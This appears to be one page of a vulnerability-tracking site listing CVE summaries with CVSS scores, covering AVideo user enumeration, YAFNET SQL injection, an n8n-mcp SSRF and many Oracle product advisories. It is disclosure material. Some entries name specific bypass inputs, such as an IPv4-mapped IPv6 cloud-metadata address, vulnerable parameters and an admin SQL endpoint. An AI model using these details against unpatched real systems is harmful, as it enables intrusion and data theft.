Unauthenticated user enumeration in AVideo objects/users.json.php allows remote attackers to disclose all registered user accounts via an isCompany parameter that bypasses admin-only access controls, and a users_id parameter that acts as a sequential-ID existence oracle. An unauthenticated attacker can harvest the complete user directory-including display names, numeric IDs, profile URLs, photos, and active/inactive status-in a single unbounded GET request, enabling credential stuffing and phishing campaigns. The vulnerability affects AVideo through version 29.0; vendor patch available.

Authentication Bypass Oracle CSRF +1
NVD GitHub
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Authorization bypass in YAFNET forum software (versions ≤4.0.4) allows any low-privileged authenticated user to execute arbitrary SQL commands against the backend database. The flaw stems from a misplaced ASP.NET Core filter (`PageSecurityCheckAttribute`) that validates admin privileges *after* page handlers execute, enabling attackers to inject SQL via the `/Admin/RunSql` endpoint before the 302 redirect occurs. Publicly available exploit code exists (GitHub advisory GHSA-xhw7-j96h-c3g5) demonstrating time-based blind SQL injection to extract `@@VERSION` and manipulate identity tables. CVSS 8.8 (AV:N/AC:L/PR:L) reflects network-accessible exploitation requiring only a standard forum account-trivially obtained via self-registration on most deployments. Vendor-released patch available in version 4.0.5.

Oracle SQLi
NVD GitHub
EPSS 0% CVSS 8.7
HIGH This Week

SQL injection in Oracle MCP Server Helper Tool 1.0.1-1.0.156 allows low-privileged authenticated attackers to execute malicious SQL queries with high confidentiality and integrity impact across security boundaries. The vulnerability requires network access via HTTP and user interaction, affecting the helper tool component. With CVSS 8.7 and easily exploitable characteristics (AC:L), this represents significant risk for organizations running affected versions, though no public exploit or active exploitation (CISA KEV) has been identified at time of analysis. The changed scope (S:C) indicates potential impact beyond the vulnerable component itself.

Oracle SQLi
NVD VulDB
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Server-Side Request Forgery (SSRF) in n8n-mcp SDK allows authenticated remote attackers to access cloud metadata endpoints and internal network resources via IPv4-mapped IPv6 address bypass. Versions 2.47.4 through 2.47.13 fail to validate IPv6 addresses in the synchronous URL validator (SSRFProtection.validateUrlSync()), enabling attackers who control the n8nApiUrl parameter to bypass RFC1918, localhost, and cloud metadata protections using addresses like [::ffff:169.254.169.254]. The vulnerability is non-blind SSRF returning response bodies to the attacker, and forwards the n8nApiKey in the x-n8n-api-key header to attacker-controlled targets. Confirmed actively exploited (CISA KEV). Vendor-released patch: version 2.47.14. EPSS exploitation probability not provided but risk is elevated given KEV status and availability of exploit code in the GitHub advisory.

SSRF Microsoft Oracle +2
NVD GitHub
EPSS 0% CVSS 2.7
LOW PATCH Monitor

Admidio members_assignment_data.php endpoint leaks hidden profile field values through a blind search oracle attack. Role leaders with ROLE_LEADER_MEMBERS_ASSIGN permissions can infer exact values of hidden PII fields (birthdays, street addresses, cities, postal codes, countries) by observing which users appear in search results, despite these fields being suppressed from JSON output. The vulnerability affects Admidio versions up to 5.0.8 and is fixed in 5.0.9.

PHP Oracle Information Disclosure
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

SQL injection in n8n's Oracle Database node allows attackers to inject arbitrary SQL commands through the Limit field when user-controlled input is passed via expressions, enabling data exfiltration from connected Oracle databases. Exploitation requires a specific workflow configuration where external input (e.g., from webhooks) reaches the Limit field; authentication depends on the webhook's access controls. The vulnerability affects n8n versions prior to 1.123.32, 2.17.4, and 2.18.1, and vendor-released patches are available.

Oracle Code Injection
NVD GitHub VulDB
EPSS 0% CVSS 8.2
HIGH PATCH This Week

SmarterTools SmarterMail builds prior to 9610 contain a cryptographic weakness in the file and email sharing endpoints that use DES-CBC encryption with keys and initialization vectors derived from System.Random seeded with insufficient entropy, reducing the seed space to approximately 19,000 possible values. An unauthenticated attacker can use the attachment download endpoint as an oracle to determine the seed in use and derive encryption keys and initialization vectors to forge sharing tokens for arbitrary emails, attachments, or file storage contents without prior access to the targeted content.

Oracle Information Disclosure
NVD VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Traefik's BasicAuth middleware contains a timing side-channel vulnerability that allows attackers to enumerate valid usernames through response-time analysis. A map key/value confusion in the constant-time comparison fallback causes the `notFoundSecret` variable to always resolve to an empty string, causing authentication checks against non-existent users to complete in microseconds (~0.48ms) instead of performing full bcrypt evaluation (~62ms), creating a 130x timing oracle. Attackers can distinguish existing users from non-existent ones by measuring HTTP response times, enabling account enumeration without credentials.

Oracle Information Disclosure Python +2
NVD GitHub
EPSS 0% CVSS 6.4
MEDIUM This Month

Vulnerability in the Oracle Security Service product of Oracle Fusion Middleware (component: C Oracle SSL API). Supported versions that are affected are 12.2.1.4.0 and 12.1.3.0.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle Security Service. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Security Service accessible data as well as unauthorized access to critical data or complete access to all Oracle Security Service accessible data. CVSS 3.1 Base Score 6.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N).

Authentication Bypass Oracle
NVD
EPSS 0% CVSS 7.5
HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H).

Oracle Authentication Bypass
NVD VulDB
EPSS 0% CVSS 2.3
LOW Monitor

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 2.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).

Denial Of Service Oracle Authentication Bypass
NVD VulDB
EPSS 0% CVSS 3.2
LOW Monitor

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 3.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N).

Authentication Bypass Oracle
NVD VulDB
EPSS 0% CVSS 5.0
MEDIUM This Month

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data as well as unauthorized read access to a subset of Oracle VM VirtualBox accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 5.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L).

Denial Of Service Oracle Authentication Bypass
NVD VulDB
EPSS 0% CVSS 6.0
MEDIUM This Month

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).

Authentication Bypass Oracle
NVD VulDB
EPSS 0% CVSS 7.5
HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H).

Oracle Authentication Bypass
NVD VulDB
EPSS 0% CVSS 7.5
HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via RDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass
NVD VulDB
EPSS 0% CVSS 5.2
MEDIUM This Month

Vulnerability in the Oracle Hyperion Infrastructure Technology product of Oracle Hyperion (component: Lifecycle Management). The supported version that is affected is 11.2.24.0.000. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hyperion Infrastructure Technology. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Hyperion Infrastructure Technology accessible data as well as unauthorized read access to a subset of Oracle Hyperion Infrastructure Technology accessible data. CVSS 3.1 Base Score 5.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:N).

Authentication Bypass Oracle
NVD
EPSS 0% CVSS 7.8
HIGH This Week

Vulnerability in the Oracle Application Development Framework (ADF) product of Oracle Fusion Middleware (component: ADF Faces). Supported versions that are affected are 12.2.1.4.0 and 14.1.2.0.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Application Development Framework (ADF) executes to compromise Oracle Application Development Framework (ADF). Successful attacks of this vulnerability can result in takeover of Oracle Application Development Framework (ADF). CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

Oracle Authentication Bypass
NVD
EPSS 0% CVSS 7.5
HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H).

Oracle Authentication Bypass
NVD VulDB
EPSS 0% CVSS 5.7
MEDIUM This Month

Vulnerability in the PeopleSoft Enterprise CS Student Records product of Oracle PeopleSoft (component: Research Tracking). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise CS Student Records. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise CS Student Records accessible data. CVSS 3.1 Base Score 5.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N).

Authentication Bypass Oracle
NVD
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.45, 8.4.0-8.4.8 and 9.0.0-9.6.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass Red Hat +1
NVD VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.0-8.0.45, 8.4.0-8.4.8 and 9.0.0-9.6.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass Red Hat +1
NVD VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.0-8.0.45, 8.4.0-8.4.8 and 9.0.0-9.6.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass Red Hat +1
NVD VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.0-8.0.45, 8.4.0-8.4.8 and 9.0.0-9.6.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass Red Hat +1
NVD VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.0-8.0.45, 8.4.0-8.4.8 and 9.0.0-9.6.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass Red Hat +1
NVD VulDB
Prev Page 4 of 87 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy